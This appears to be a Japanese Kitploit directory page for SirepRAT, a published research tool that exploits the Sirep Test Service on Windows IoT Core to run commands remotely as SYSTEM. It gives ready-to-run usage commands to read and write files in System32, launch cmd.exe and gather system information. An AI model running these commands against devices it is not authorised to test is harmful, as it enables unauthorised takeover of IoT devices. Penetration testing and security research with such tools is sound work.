Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/safebreach-labs/sireprat
IoTセキュリティエクスプロイトポストエクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツールペイロード開発
GitHubsafebreach-labs/sireprat

SirepRAT

Windows IoT Core 上での SYSTEM としてのリモート コマンド実行(Python2.7 および Python3 向けのリリースが利用可能)

リポジトリを見る
3889135年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SirepRAT

SirepRAT - Windows IoT Core 上で SYSTEM として RCE

SirepRAT は、ターゲットに実際の RAT マルウェアを作成する必要なく、完全な RAT 機能を提供します。

背景

この方法は、Microsoft のサイトで提供されている公式イメージに組み込まれ、実行されている Sirep Test Service を悪用するものです。このサービスは、IoT デバイス上でドライバー/ハードウェアテストを実行するために構築できる HLK セットアップのクライアント部分です。Sirep/WPCon/TShell プロトコルを提供します。

私たちは Sirep/WPCon プロトコルを解析し、このプロトコルが攻撃者にリモートコマンドインターフェースを公開する方法を実証しました。これには、任意の場所への任意のファイルの取得/配置やシステム情報の取得といった RAT 機能が含まれます。

この調査から得られたサービスとプロトコルに関する発見に基づき、サポートされているさまざまなコマンドを使用してそれらを悪用できるシンプルな Python ツールを構築しました。それを SirepRAT と名付けました。

Windows IoT Core ターゲットにコマンドを送信するための、簡単で直感的なユーザーインターフェースを備えています。公式の Microsoft イメージを実行している、ケーブル接続された任意の Windows IoT Core デバイスで動作します。

スライドとホワイトペーパー

スライドと調査ホワイトペーパーは docs フォルダー にあります。

セットアップ

root@kitploit:~
pip install -r requirements.txt

使用方法

ファイルのダウンロード

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

ファイルのアップロード

root@kitploit:~
python SirepRAT.py 192.168.3.17 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world!"

任意のプログラムの実行

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"

引数付きで、現在ログオン中のユーザーとして偽装:

root@kitploit:~
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"

(as_logged_on_user フラグなしで実行すると、SYSTEM として実行される機能を確認できます)

システム情報の取得

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetSystemInformationFromDevice

ファイル情報の取得

root@kitploit:~
python SirepRAT.py 192.168.3.17 GetFileInformationFromDevice --remote_path "C:\Windows\System32\ntoskrnl.exe"

詳細はヘルプを参照してください:

root@kitploit:~
python SirepRAT.py --help

作者

Dor Azouri (@bemikre)

貢献者

movatica (@movatica) - Python 3 への移植! (2020年の終わりごろ)

ライセンス

BSD 3 - 「New」または「Revised」ライセンス条項

ツールをダウンロード